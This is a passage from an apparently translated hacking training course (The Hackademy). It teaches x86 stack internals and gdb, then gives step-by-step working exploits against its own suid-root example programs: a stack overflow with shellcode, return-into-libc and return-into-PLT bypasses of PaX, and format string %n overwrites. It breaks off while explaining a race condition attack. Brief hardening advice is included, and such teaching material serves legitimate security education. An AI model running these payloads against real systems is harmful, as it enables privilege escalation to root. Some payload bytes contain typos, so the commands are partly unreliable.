: push %ebp | | 0x8048359 : mov %esp,%ebp | | 0x804835b : sub $0x8,%esp | | 0x804835e : and $0xfffffff0,%esp | | 0x8048361 : mov $0x0,%eax | | 0x8048366 : sub %eax,%esp |---- 0x8048368 : call 0x8048344 |--->0x804836d : leave 0x804836e : ret 0x804836f : nop End of assembler dump. The Hackademy

DMP

-140/209-

SYSDREAM

A few assembler notions Let us see several essential assembler instruction: call 0x8048344 : When a routine calls a subroutine, it does an instruction call, which then jumps onto the address of the jump function in the .text section. ret : When all the instructions of a subroutine have been executed, the program returns to the address following the call on this subroutine. In this example, the call to the RET instruction at the 0x8048357 address will make the program jump to the address following the func call, that is 0x804836d. This instruction present at the end of eacj subroutine is actually a macro that successively executed pop %eip jmp %eip

Registers Registers, (eax, ebx, ecx, edx, eip, ebp, esp ...) have a size of 32 bits or 4 bytes on Linux/X86 platforms. Three of these are of a particular interest to us. EIP

(Instruction Pointer): In this register is saved the address where the program must jump to in the .text at the output of a subroutine, that is during the call to ret.

ESP

(Stack pointer): This register always points to the end of the stack (we will talk about this soon).

EBP

When a new subroutine is called, new elements will be piled on top of the stack and so the ESP will be modified. So we save the old value of ESP in EBP, in order to re-attribute its previous value to the Stack Pointer during the call to RET.

Let us check the state of registers during the call to the func function in our previous example: Stack level 0, frame at 0xb64950e8: eip = 0x804834a in func; saved eip 0x804836d called by frame at 0xb64950f8 Arglist at 0xb64950e8, args: Locals at 0xb64950e8, Previous frame's sp in esp Saved registers: ebp at 0xb64950e8, eip at 0xb64950ec We can see that the EIP saved is: saved eip 0x804836d, which is the expected address.

The Hackademy

DMP

-141/209-

SYSDREAM

D) The Stack When arguments are passed on to a function, or when local variables are declared in subroutines, these are defined in a memory zone called stack. This zone does not have a fixed size and it is especially used in order to store variables or to save registers. It functions on the LIFO model, meaning that elements are piled on top of each other as a pile of plates would be. The last element piled on top will be the first one to be withdrawn. As an assembler, to pile an element, we use the PUSH function. In order to withdraw an element from the pile, we PULL it. It should also be noted that on linux/86, we can use little endian, whereby elements are piled towards the bottom, and always on an alignment of 4 bytes. During a call, we are first going to Push on the pile the arguments passed to the function to which we jump. Then, a backup of the EIP, that is the address of the code section onto which we will jump at the output of the subroutine, will be Pushed. The stackpointer register, the ESP, always points towards the top of the pile. The EBP register always has the value of the ESP before the call to the subroutine, in order to have the Stack Pointer find its initial position at the output of the subroutine. But before copying the last ESP into EBP, we will save the present EBP, that we will also push onto the pile. Any routine will thus start with the instructions: push %ebp mov %esp,%ebp Finally, all the local variables declared in the subroutine will be in turn pushed onto the Stack. In the opposite case, at the end of the subroutine, we will restore the value of the first ESP before the call to the specified routine; this value having been saved in the EBP register, then we will restore the old value of EBP, whose backup has been pushed onto the stack. Finally, we will take off the following element from the pile, this being the EIP backup, in the EIP register, before jumping onto it in order to return the address of the code section following the CALL of the calling routine. So the last instructions of a subroutine will always be: leave ret that are macros for: mov %ebp,%esp pop %ebp pop %eip jmp %eip

The Hackademy

DMP

-142/209-

SYSDREAM

Let us study the representation of the pile during the call to the vuln subroutine of the following program: // vuln1.c int vuln(char *arg) { char buffer[512]; int i; strcpy(buffer, arg); return 1; } int main (int argc, char *argv[]) { if (argc < 2) exit(0); vuln(argv[1]); exit(1); } This is how the various elements of the func subroutine will be pushed onto the pile:

E) Using gdb gdb is a debugger, and among other things it will allow you to check the state of registers and the contents of memory at any moment of the process execution. This tool is above all destined to developers so that they can find the bugs in their programs: indeed, looking for bugs is just what we are talking about. gdb is used only in command line, but remains the standard on Linux. Usage You will start gdb simply by calling it or by passing on to it as an argument the name of the file to debug. That way you will have access to the gdb prompt that will allow us to follow the evolution of the program memory. Here is a list of basic commands:

The Hackademy

DMP

-143/209-

SYSDREAM

$gdb (gdb) r arg <-- Starts the program with arg argument(s) (gdb) i f <-- sends back the backup state of EBP, EIP registers, and their addresses in memory (gdb) i r <-- sends back the state of registers (gdb) x/500x 0x41414141 <-- Dumping of memory from the address 0x41414141 (gdb) x/500x $esp <-- Dumping of the memory from the position pointed to by ESP, that is from the top of the stack (gdb) b function_name <-- Can put a breakpoint to any address in memory (here during the beginning of the execution of the subfunction function_name). (gdb) c <-- Can keep on executing a program when a breakpoint is encountered (gdb) q <-- Quit gdb

F) Stack overflow In the type of operation by memory overflow, those concerning the Stack are the most common and the most easily exploiable. This is how they work: The buffer of the vuln subfunction has been declared as having a size of 512 bytes, meaning that it is a character table (or buffer) that is capable of containing 512 characters. The register backups on the pile are encoded on 4 bytes (that is the size of registers in 32 bits). Finally, the two arguments of the func subfunction are buffer addresses (and not the buffer itself), they are encoded on 4 bytes. What would happen if we managed to write 4 more bytes than the maximum size of the buffer ( so a total of 516 bytes = 512 + 4) into it. Then the 4 bytes of the EBT would be overwritten. And if we wrote 4 more bytes (so a total of 520), then it is the backup of the EIP register which would be overwritten. If we can overwrite EIP with an arbitrary value, during the call to RET, it is the value that we have modified of the EIP backup which will be POP of the pile, and onto which the program will jump. So we can redirect its execution anywhere in memory. WARNING: The vuln1 program has been compiled with gcc-2.95. This compiler, from the 3.X versions, adds a padding of at least 4 bytes (depending on the compilation options) between the first buffer pushed onto the stack and the EBP backup. Let us execute vuln1 by giving it as an argument a chain of 520 characters. (gdb) r `perl -e 'print "A" x 512 . "AAAA" . "DCBA"'` We use the perl interpreter to pass on a string of 512 + 4 + 4 characters to the vulnerable program. Starting program: /home/xdream/HZV/CVS/vuln1 `perl -e 'print "A" x 512 . "AAAA" . "DCBA"'` (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x41424344 in ?? ()

The Hackademy

DMP

-144/209-

SYSDREAM

The program segfaulted when trying to jump to the 0x41424344 address, which is the hexadecimal representation of the character chain “DCBA” (remember that in little endian the stack is filled from the bottom up). We were thus able to force the program to jump to a memory address arbitrarily chosen during the output of the subroutine. The idea is to make the program jump onto an asm instruction chain injected in memory to execute a /bin/sh. This instruction chain is usually called a shellcode. There are a great number of shellcodes on the Internet, especially for Linux, and to execute any type of arbitrary command (shell, shell bind, reverse connection, covert channel, ...) The simplest way to inject our shellcode in memory is of course to pass it on as an argument to the vulnerable binary, so that it will find itself in the buffer that will be overflowed. There is however one last problem we must face. For the program to execute an arbitrary code, it is necessary to overwrite the EIP with the exact address in memory where the shellcode starts (generally at the beginning of the buffer). Of course, it is very easy to obtain this information during an attack in memory by dumping the memory in order to find the buffer address. However, when attacking in remote, it is often impossible to dump the memory and determine the address of the buffer. The margin of error seems to be very much reduced.

It is possible to increase this margin, by having a series of NOP instructions (0x90) precede the shellcode (the important thing being that the number of NOP + the shellcode size < 512). These NOP instructions mean: Don't do anything, go to the next instruction. We will therefore jump from byte to byte until we fall onto our shellcode's first byte, which will then be executed normally. This is what the character chain must look like passed on as a vuln1 argument: To generate our character chain with shellcode, we are going to use the xploit.c shellcode generator, which you will be able to download from http://www.thehackademy.net. Options to pass on to it: -b size -x addr -o offset -E VAR

The Hackademy

specify the size of the chain used for the overflow You can specify an address that points directly to the NOP You can add (or deduct) a decimal number to the return address to be used in order to brute force this return address (that is to vary the address used until the right one is found). Specify the name of an environment variable into which we will store the character chain which will be passed on as argument. That way, we will be able to use this variable to pass it on directly to the vulnerable program. DMP

-145/209-

SYSDREAM

All we have to do now is inject a string containing the shellcode to execute and to overwrite the EIP through the address found previously: [NOP]...[NOP][SHELLCODE][0xbffffb10] We are going to see how to operate the vuln1.c program whose bit suid root will have been activated: $chown root.root vuln1 $chmod 4755 vuln1

Let us use xploit.c to generate the chain (destined to operate the program) into an environment variable, that you will give as an argument to the vulnerable suid root. We will use it twice in a row, first to inject the character chain containing the shellcode in order to determine the buffer address with the gdb, then to inject the same string by overwriting the EIP through the address found. First, we overwrite EIP with an address by default. $./xploit -b 600 -E RET

We are going to look for an address pointing to the NOP preceding the shellcode with the help of gdb. xdream@Laptop:/tmp$ gdb vuln1 (gdb) r $RET Starting program: /tmp/vuln1 $RET (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0xbffffade in ?? ()

We have redirected the program execution towards the address by default that does not contain the shellcode. Let us dump the memory from the address pointed by ESP (the top of the pile), while we are looking for the injected chain: (gdb) x/500x $esp 0xbffff6c3: 0xfaafb8bf 0xbffff6d3: 0xfffab800 ... 0xbffff843: 0x00000000 0xbffff853: 0x00316e6c 0xbffff863: 0x90909090 0xbffff873: 0x90909090 0xbffff883: 0x90909090

The Hackademy

DMP

0xf6cdbfff 0xfffab8bf

0xcff8bfff 0xfffab8bf

0x00004014 0xfffab8bf

0x36383669 0x90909090 0x90909090 0x90909090 0x90909090

0x6d742f00 0x90909090 0x90909090 0x90909090 0x90909090

0x75762f70 0x90909090 0x90909090 0x90909090 0x90909090

-146/209-

SYSDREAM

We can determine that at address 0xbffff863 are the NOPs preceding our shellcode. We are going to overwrite EIP with this new value: xdream@Laptop:/tmp$ ./xploit -b 600 -E RET -x 0xbffff863 Addr: 0xbffffe03 xdream@Laptop:/tmp$ ./vuln1 $RET sh-2.05b# id uid=1015(xdream) gid=1015(xdream) (audio) sh-2.05b#

euid=0(root)

groups=1015(xdream),29

The newly obtained shell has an activated bit suid root, we can therefore execute any action under the root count on the system.

Security The main cause of vulnerability of programs is the use of certain dangerous functions that do not check the copied data size in a destination buffer. So the following functions must be banned: strcpy(), strcat(), strcmp() ... and replaced with their equivalent strn*() Secondly, on Linux, you can protect your system by patching your kernel with grsecurity. Among others, it implements pAx, which makes the stack non executable. Its installation will be detailed later on.

G) Return into glibc and return into glibc Fonctioning of pAx The standard exploitation of a stack overflow as seen in the previous section implies that we jump on a shellcode that resides in memory. So the shellcode must be copied in a zone that is accessible in execution. That is the case by default for all of Linux. PAX makes this zone non executable. That is also the case in the data section or in others into which we could inject the shellcode. We will see that it is possible to bypass this local protection by using Return Into glibc. Exploitation There remains one notion to introduce in the execution of memory programs. They dynamically charge in memory the library or libraries that they need. We can know all the libraries dynamically linked by a binary thanks to the Idd tool: $ldd /bin/ls librt.so.1 => /lib/librt.so.1 (0x40022000) libc.so.6 => /lib/libc.so.6 (0x40034000) libpthread.so.0 => /lib/libpthread.so.0 (0x40162000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) The Hackademy

DMP

-147/209-

SYSDREAM

These libraries have a certain number of pre-programmed functions, such as the functions print, write, read, ... that are compiled in libc6. In order to bypass the non execution of the stack, we are simply going to jump on the functions contained in libc6. So we are going to overwrite the EIP backup on the stack with the function address that is of interest to us in libc6. But in doing this, we are going to call a new function. So we have to save a fake EIP as a return address (we will use the address of a call to exit() in order to exit properly) that we will forward from the argument to have executed to the requested function. Which function are we going to use? The system() function, that executes what is sent to it as an argument by pushing it onto the pile, seems to be the best one .So we will have to obtain its address through which we will overwrite the EIP, then the address of the exit function, used as the next return address at the output of the system function, and finally the address in memory of a /bin/sh string that we will use as a system() argument.

Practical use Let us first determine the addresses of the system and exit functions thank to gdb: xdream@Laptop:/tmp$ gdb vuln1 We can then continue by placing a breakpoint during the call to the vulnerable subroutine and then starting the program (if we do not place this breakpoint, we will not be able to determine the system and exit addresses): (gdb) b vuln Breakpoint 1 at 0x804837d (gdb) r AAAA Starting program: /tmp/vuln1 AAAA (no debugging symbols found)...(no debugging symbols found)... Breakpoint 1, 0x0804837d in vuln ()

The Hackademy

DMP

-148/209-

SYSDREAM

The we can look in libc6 for the addresses of the two functions that are of interest to us: (gdb) x system 0x40062980 : 0x83e58955 (gdb) x exit 0x4004da30 : 0x57e58955

We must still determine the address of a /bin/sh in memory: $./srch "/bin/sh" found at: 0x4014273d

All we have to do now is to overwrite EIP with the addresses found: 0x40062980 0x4004da30 Do not forget that in little endian, we fill the stack, and therefore the addresses as well, from the bottom up: $./vuln1 `perl -e 'print "A" x 524 . "\x80\x29\x06\x40" . "\x30\x04\xda\x30" . "\x3dd\x27\x14\x40"'` sh-2.05b#

H) Return into .PLT PaX and the randomization of memory A second protection has been put into place in order to prevent the problem of bypassing through return into glibc. The idea is to randomize the basic address or libc and to map the other lib into memory. As the functions are always defined in relative value, that is related to an offset, that we will add to the basic libc address. We can no longer determine the address of the library which will be randomized each time, so we can longer determine the addresses of the functions we are interested in. So we will use a Return into PLT type exploitation to bypass this protection. Exploitation The PLT Section: Each function that has previously been called in the program will be referenced in this section. Each entry will make it possible, among other things, to jump onto the .got address containing the absolute address of the called function. If a function we are interested in has been previously called in the program, it will be referenced in the PLT. As this section is never randomized in memory, we can simply determine the function's entry in the .PLT in order to jump onto this address, which will make us jump on to its address in libc6.

The Hackademy

DMP

-149/209-

SYSDREAM

There remains one last problem, however. We need the string “/bin/sh” address that we are going to look for in libc6, and it is always randomized. It often happens that the values entered by the user are stored into global variables. These variables are stored in the .data section, and this section is not randomized in memory either. If we manage to determine the address of a global buffer into which we can inject the “/bin/sh” string, then we will be able to pass on its address as an argument from the call to system via .plt. Here is the program which we will use as an example: // vuln2.c char data[512]; int vuln (char *arg) { char buffer[512]; strcpy(buffer, arg); printf("\nbuffer !!! %s\n", buffer); return 1; } int main(int argc, char *argv[]) { if (argc < 3) exit(0); strcpy(data, argv[2]); printf("variable data:\nMy address !!! %p\nMy contents !!! %s\n", data, data); vuln(argv[1]); exit(0); } We copy the contents of the second argument into the global variable, and we will place the “/bin/sh” string there. The buffer address containing it, declared in .data, is not randomized: xdream@Laptop:/tmp$ ./vuln2 AAAA /bin/sh variable data: My address !!! 0x8049780 My contents !!! /bin/sh buffer !!! AAAA xdream@Laptop:/tmp$ ./vuln2 AAAA /bin/sh variable data: My address !!! 0x8049780 My contents !!! /bin/sh vuln2 vuln2.c buffer !!! AAAA xdream@Laptop:/tmp$

The Hackademy

DMP

-150/209-

SYSDREAM

We can also see in the sources a call to the system function, so this function is referenced into the . PLT. We can then overwrite the EIP backup on the stack with the system and exit address in the stack, and pass on as a system argument the buffer address declared as global, in order to have it execute the /bin/sh command. Let us determine the jump onto system and onto exit address in the .plt thanks to gdb: xdream@Laptop:/tmp$ gdb vuln2 We start by disassembling the vuln function to look for the address onto which the program can jump during its call to system: (gdb) disas vuln Dump of assembler code for function vuln: 0x80483e4 : push %ebp 0x80483e5 : mov %esp,%ebp 0x80483e7 : sub $0x218,%esp 0x80483ed : movl $0x80485e0,(%esp,1) 0x80483f4 : call 0x80482c4 <--- This is the value of interest to us 0x80483f9 : mov 0x8(%ebp),%eax 0x80483fc : mov %eax,0x4(%esp,1) 0x8048400 : lea 0xfffffdf8(%ebp),%eax 0x8048406 : mov %eax,(%esp,1) 0x8048409 : call 0x8048304 0x804840e : lea 0xfffffdf8(%ebp),%eax 0x8048414 : mov %eax,0x4(%esp,1) 0x8048418 : movl $0x80485e8,(%esp,1) 0x804841f : call 0x80482e4 0x8048424 : mov $0x1,%eax 0x8048429 : leave 0x804842a : ret End of assembler dump.

We disassemble from the address to which the call is made, 0x80482c4, which points to the .got section. (gdb) disas 0x80482c4 Dump of assembler code for function system: 0x80482c4 : jmp *0x8049730 0x80482ca : push $0x0 0x80482cf : jmp 0x80482b4 <_init+24> End of assembler dump.

The address contained at 0x80482c4 is a reference to the system address contained in the .got, and we can have it execute calls to the functions wanted, by jumping directly onto the address given as a call argument, which points to .plt. We will proceed similarly to determine the exit address in memory. Here are the addresses obtained: "/bin/sh" : 0x8049780 system : 0x80482c4 exit : 0x80482b4 The Hackademy

DMP

-151/209-

SYSDREAM

Let us try to exploit this program with this string created in this way: $./vuln2 `perl -e 'print "A" x 524 . "\xc4\c82\x04\x08" . "\xb4\x82\x04\x08" . "\x80\x97\x04\x08"'` /bin/sh xdream@Laptop:/tmp$ ./vuln2 `perl -e 'print "A" x 524 . "\xc4\x82\x04\x08" . "\xb4\x82\x04\x08" . "\x80\x97\x04\x08"'` /bin/sh variable data: My address !!! 0x8049780 My contents !!! /bin/sh #DD# E gconfd-xdream ssh-nanXM835 vuln2 AZ H netperf.debug tt xmms_xdream.0 DD R orbit-xdream v xploit DRE Y session_mm_apache0.sem vuln1 buffer !!! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAÄ´ sh-2.05b# sh-2.05b# exit

Once again, we have root passed on the system. Hopefully, we have demonstrated that security systems at the kernel level can be a good thing, but like anything else, they are not nearly enough to totally secure a system. We have seen that bypassing these protections on a potentially vulnerable system can be trivial. So it is essential to always have one's software up to date, and of course to multiply the chroot, the suppression of most suid roots, in order to prevent a hacker's elevation of status on a compromised system. Installing log and internal surveillance tools, of the hids type, are essential to detect the attacks of a would-be hacker. We will return to this matter in the last part of this course.

Security As said previously, installing the grsecurity patch on a Linux system is the best protection possible. You can download it from http://www.grsecurity.org. Download the version corresponding to the version of your kernel, and copy it into the directory, where it will be decompressed: patch -p0 < grsecurity-xxx.patch

A new option called grsecurity is then available. You can select the options corresponding to the stack protection and the randomization of addresses in the pAx section.

The Hackademy

DMP

-152/209-

SYSDREAM

3. String Format Presentation String formats, more commonly called format chains, are variables of the character chain type destined to undergo a certain formatting or data arranging in C language. This type of chain can cause a number of problems; it can compromise the execution flow of a vulnerable program, this is what is called a bug format or a format bug. Origins Bug formats are quite often the result of a bad usage of printf type functions (printf, fprintf, sprintf, snprintf). A program can be compromised from the moment a format chain can be controlled by the user. This type of vulnerability is therefore due to a programming error, just as buffer overflow type vulnerabilities can be, for example. Functioning of printf type functions. Let us now analyse the functioning of printf type functions. To do this, we can use the following example: void main(){ int i = 3; float f = 2.5; char chain[]="character chain"; printf("i = %d, f = %f, chain = %s\n",i,f,chain); return; } bash# ./prog i = 3, f = 2.50000, chain = character chain. bash#

From an assembler point of view, printf function arguments are placed on the pile: push chain push f push i push "i = %d, ..." call printf

The Hackademy

DMP

-153/209-

SYSDREAM

printf type functions are functions with a varying number of arguments. So the number of arguments is deduced from the format chain. When it has arrived in the printf function, the format chain is recovered (it is the first argument recovered on the pile). Then this format chain is browsed. For each format indicator ('%d', '%x', '%s', ...), an argument is recovered on the top of the pile. In our example, 4 arguments have been provided to to the printf function. So the format chain will be recovered on the pile. Then, for each format indicator, (%d, %f et %s), an argument will be extracted from the pile (pop assembler instruction). The vulnerability Let us now imagine that the user can control this format chain. A vulnerable program would look as follows: void main(int ac, char *av[]){ if( av[1] ) printf(av[1]); printf("\n"); return; } bash# ./prog lol lol bash#

Up to this point, everything is normal. The program simply displays the chain passed on as an argument. Let us now place format indicators in our chain. bash# ./prog '%x %x %x' 589238 0 589238 #bash

What is happening? The printf function will try to recover the arguments on the pile according to the format indicators, but none have been given to it. We will therefore be able to explore the whole pile. So we can already recover a certain number of informations on the program memory (memory leak). Exploitation At first view, we might think that printf type functions only enable us to read information. Well, that is not the case. There is a little-known format indicator that can enable us to write to any given address, the '%n' indicator. This indicator gives the number of characters written (or that should have been written) up to it and must be placed in the argument to which it corresponds. The argument corresponding to '%n' must be an integer pointer. void main(){ int i; printf("foobarfoo%nbarbar\n", &i); printf("i = %d\n", i); } bash# ./prog foobarfoobarbar i = 9; bash# The Hackademy

DMP

-154/209-

SYSDREAM

So when the '%n' indicator is encountered, 9 characters have already been written (it is the “foobarfoo” chain). The value 9 is thus stored at the address of argument i. So we realize that it is possible for us to write a value at our address of choice. With the elements we have, it is possible to recover enough information to know where to write in order to hijack the execution flow of a vulnerable program. Exploitation example. We have the following vulnerable program: // ----vuln.c---#include void func(char *str) { printf(str); } int main(int ac, char *av[]) { char buf[200]; buf[read(0, buf, 200)]=0; func(buf); printf("Bye bye !\n"); }

This very simple program reads a character chain on the standard entry and displays the chain via the printf function. First of all, we need to recover this information.

bash#./vuln AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %X AAAA 447470 bffff928 c8 bffff850 520f23 bffff928 80483d5 bffff850 bffff850 c8 464077 41414141 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 Bye bye ! bash#

We place the “AAAA” chain at the beginning of our format chain in order to easily determine its memory location. We can notice that the 12th “%x” generates the display of the value 41414141, i.e. the hexadecimal equivalent of our AAAA chain. We can also notice the value bffff850, which corresponds to the first argument of the printf() function. So this value is the format chain address in memory. With each couple (address, contents), we can know the address of each element of the pile. We therefore know that the value 41414141 is located at address 0xbffff850. We know that the”%n” indicator takes as an argument a pointer, so we are going to use the format chain itself to provide the address where we want to write. In order to move in the arguments of the format chain, it is possible to format our indicator as follows: %12$x, this means that the 12th argument will be used. This formatting can also be used in the case of writing via '%n'.

The Hackademy

DMP

-155/209-

SYSDREAM

bash#./vuln AAAA %12$x AAAA 41414141 Bye bye ! bash#

Let us now try to write a value anywhere. bash#./vuln AAAA %12$n Segmentation error bash#

The program crashes. What happened? Well, we moved to the 12th argument, that is at the location in the format chain “AAAA%12$n”, and we tried to write via '%n' the number of characters already written. '%n' expecting a pointer will thus translate AAAA (0x41414141) as if it were a memory address and it will try to write onto it the value 5 at address 0x41414141. This address not being mapped in memory, the program ends with a segmentation error. So we can write the number of characters displayed at the memory location of our choice. For example, if we want to write 0x00006666 at address0xbffff850, we can proceed this way: bash# printf %d 0x00006666 26214 bash# echo `printf "\x50\xf8\xff\xbf%%.26210x"`%12\$n > file bash# ./vuln < file 00000000[...]000000 Bye bye ! bash#

So we have written 0x6666, that is 26214 at address 0xbffff850. The program did not crash because of the reference address 0xbffff850 of our format chain, whose later modification does not have any repercussions on our program. First of all, we are going to try to determine an address that would be interesting to overwrite in order to hijack the program execution flow. To do this, we need a function pointer to be called after our format chain has been treated. We can for example try to hijack a function of the dtors section. The functions contained in a program's dtors section are the functions that are called at the end of a program (after the function's main). We can also try to overwrite an eip (instruction register) saved in the pile or we can also try to hijack the address of a GOT (Global Offset Table) function.

The Hackademy

DMP

-156/209-

SYSDREAM

Using dtors. bash# objdump -s -j .dtors vuln vuln: file format elf32-i386 Contents of .dtors section: 80495ac ffffffff 00000000 ........ bash# We are going to overwrite the value 00000000 from which we easily deduce the address : 0x080495ac + 4 = 0x080495b0. bash# echo `printf "\xb0\x95\x04\x08%%.26210x"`%12\$n > file bash# ./vuln < file 0000[...]00000 Bye bye ! Segmentation error (core dumped) bash# When opening the core file, gdb shows us this: Program terminated with signal 11, Segmentation fault. #0 0x00006666 in ?? ()

So the program tried to execute the instructions contained at address 0x00006666, and we hijacked the program's execution flow successfully. The “Bye bye!” chain was displayed because, as we said, the functions contained in the .dtors section are executed after the main function. Overwriting a saved eip. bash# ./vuln AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x AAAA 447470 bffff928 c8 bffff850 520f23 bffff928 80483d5 bffff850 bffff850 c8 464077 41414141 20782520 25207825 78252078 20782520 25207825 78252078 20782520 Bye bye ! bash#

Seeing how data is placed, we can guess that 0xbffff850 is our format chain's address (the parameter provided at the printf function). Let us try to find what could correspond to a saved eip: we find 0xbffff928 and 0x080483d5. This could be a saved $ebp and $eip couple. With these elements in our possession, we can determine the address of this saved eip, as we know that 0xbffff850 points to 41414141. After calculating it, we can conclude that the saved eip's address is: 0xbffff850 – 20 bytes = 0xbffff83c. Let's try to overwrite this value: bash# echo `printf "\x3c\xf8\xff\xbf%%.26210x"`%12\$n > file bash# ./vuln < file 0000[...]0000 Segmentation error (core dumped) bash#

As in the previous example, we use gdb on the core file to determine what caused the segmentation error. We can see that the program crashed because the eip is equal to 0x00006666. So we have overwritten a saved eip, following the same principle as buffer overflows. From the moment we control the instruction register, the methods used to execute code are the same as in a buffer overflow. We could place our shellcode in environment or in vulnerable program parameter, or we could even create a shellcode wherever we choose to by using a format chain (since we can write what we want, where we want). The Hackademy

DMP

-157/209-

SYSDREAM

Summary and display problem In short, exploiting a format bug consists of the following steps: 1) Determining the location of our format chain 2) Determining the memory address where we wish to write (dtors, saved eip, ...). 3) Determining the value to write (shellcode or other address). 4) Creating the format chain, in the form of: [address to overwrite]%.[value to write-4]x%[location of the chain]$n 5) Sending the format chain to the vulnerable program. Problem : the number of characters to display Most of the time, we will try to replace a memory address (function pointer, saved eip) with an address of our choice. If we wish to write an address such as 0xbffff850, for example, the total number of characters to display will be 3,221,223,504! This is of course huge, and the time it will take to display will be very long. To solve this problem, we are going to write our address in two parts. We are going to write the 4 bytes of the address 2 by 2. In our example, we will write 0xbffff then 0xf850. We will first write the part with the lower value, then the part with the higher one. So our format chain will be written in the form: [A][A2]%.[VAL1 – 8]x%[O]$n%.[VAL2 – VAL1 – 8]x%[O + 1]$n if VAL1 < VAL2 or [A2][A]%.[VAL2 – 8]x%[O]$n%.[VAL1 – VAL2 – 8]x%[O + 1]$n if VAL1 > VAL2 with : A : Address to overwrite A2 : Address to overwrite +2 O : Location of the chain (number of %x necessary to the display of our format chain). VAL1 : Value to be written in part 1 VAL2 : Value to be written in part 2 In our example, if we want to write 0xbffff850 at the address 0x080495b0 and the gap of our format chain is 12, we write the following format chain: bash# printf %d 0xbfff 49151 bash# printf %d 0xf850 63568 bash# echo `printf "\xb0\x95\x04\x08\xb2\x95\x04\x08%%.49143x%%12\$n%%.14409x%% 13\$n"` > file

The file named “file” will then contain our format chain. All we will then have to do is to use the contents of this file to exploit the vulnerable program and that will be it! The Hackademy

DMP

-158/209-

SYSDREAM

Security The only solution here is to never trust data controlled by a user. printf type functions must also be used carefully. When a function takes as an argument a format chain, the latter must only be formatted by the program itself and not the user. Example : One never writes: sprintf(buf, argv[1]); but one writes: sprintf(buf, "%s", argv[1]);

4. Race Condition A) Presentation Even if they are among the least-known, “race conditions” are some of the most common bugs found on software. These vulnerabilities are extremely hard to identify and therefore to correct. Indeed, a program functioning very well can host several of these bugs in a “silent” manner, in the sense that there is no malfunctioning of the program, or at least not in a systematic way, but this can still be exploited in a malicious way. Most of the time, “race conditions” decide how robust the software is. The competing access to data can cause application instability without any other consequences. However, there are many times (by this I mean a very short lapse of time) when “race conditions” have security implications. In fact, file system accesses are subject to course connect security states much more often than most people believe. In a constantly changing IT environment, where the multi-threading, multi-treating and distributed computing are all the rage, this type of problem can only become more frequent in the future. Definition A “race condition” happens when several processes have access to and manipulate the same information or data at the same time. To “keep it simple”, a “race condition” is encountered when an A application will use information that is going to be modified in a more or less synchronous way by a B application. We then have an abnormal functioning of applications due to the bad relative synchronization of events. “Race conditions” are often encountered on numerous applications: these are possible only in environments where multi-threads are found, that is where executed processes allow a certain interactivity or at least an asynchronous treatment of information, as can happen with Unix signals, for example. The Hackademy

DMP

-159/209-

SYSDREAM

Examples A typical example is the reading and writing of information. For example, if an application or a process writes while an another one reads at the same time, the data read can be: – – –

Old values that have not been updated yet. Or instead they can be new values (which in itself is not a problem). Or worse, and this is often what happens, a mix of old and new information according to the synchronization of the writing and reading processes.

In the same manner, we can note this kind of “anomaly” at the level of the variables used by a code. One's first impression could be to think that this is an application bug type problem, which is dangerous only for the integrity of information manipulated by this same application. But this type of problem can lead to a different type of exploitation. The possibility of being able to exploit such a vulnerability depends directly on the synchronization phenomenon between the various accesses that are in fact at the level of an identical information. So if certain conditions are in place, a “race condition” can enable one to obtain the necessary privileges to access a protected system. In the same manner, let us take a slightly more complex, if unlikely, example: Let us take the IRC case, a most common example. A user A decides to create a canal called “race” on a server, at the same time as a user B decides to create a canal also called “race”, but on another server. These servers use the same network, knowing that the user who created the canal has the privileges of a canal operator, the server informs the network of the creation of each of these canals (in theory to prevent having two canals of the same name). Now let us imagine that these users decide to create their canals at the same moment; both of them will obtain the administration rights on their “race” canal since both servers will not yet be informed of the creation of a same canal on another server. We find ourselves here in a case of shared resource, entirely due to the idea of the network's state each of the servers have. In fact, when a user creates a canal, the server gives administration rights of the canal and then informs the network's other servers of this canal's status. However if there is a certain latency in inter-server communication, the “race conditions” could be in place to create the case mentioned above, and this would give each user the possibility of administrating the canal of the other user. B) Demonstration The attack Now that we know what a “race condition” is, we are going to take a closer look at the way this type of problem can be exploited. The most interesting example is of course the one concerning a gain of privileges. For this, we are going to take a simple C program which writes a character chain in a file that is passed on to it as a parameter.

The Hackademy

DMP

-160/209-

SYSDREAM

This program is “suidroot”, which means that whoever the user is, it is executed with the rights of the super-user. This program verifies the user's rights, so it goes without saying that to write in a file with “root” as owner user whose rights are -rw-r—r--, the executing user must also have super-user rights. The program functions in the following manner –

– –

The first instruction checks the user's rights, and if the user does not have the necessary rights, the execution stops and it is impossible to write in the file. If the user has the rights to this file, we then move on to the following instruction. The program opens the file to write. The program writes the character chain in the file.

Now let us imagine that we create a file called “switch” ( as a non-privileged user) and a “target” file (as a super user). As a non privileged user, we have writing rights on the “switch” file but not on the “target” file. If we use the “race” program to write any chain of characters in the switch file, there will be no problems. However if we try to write in the “target” file, the program will refuse. So the idea is to modify “switch” between the verification of rights instruction and the opening of file instruction so that the “switch” file be replaced by a symbolic link on the “target” file; this way we can bypass the verification of rights (this verification of rights is done on the “switch” file, which in the meantime is replaced by a link on “target”) and so we can write in the “target” file, something that is normally forbidden. Example

Instruction of cecking users rights

Exploitation possibility

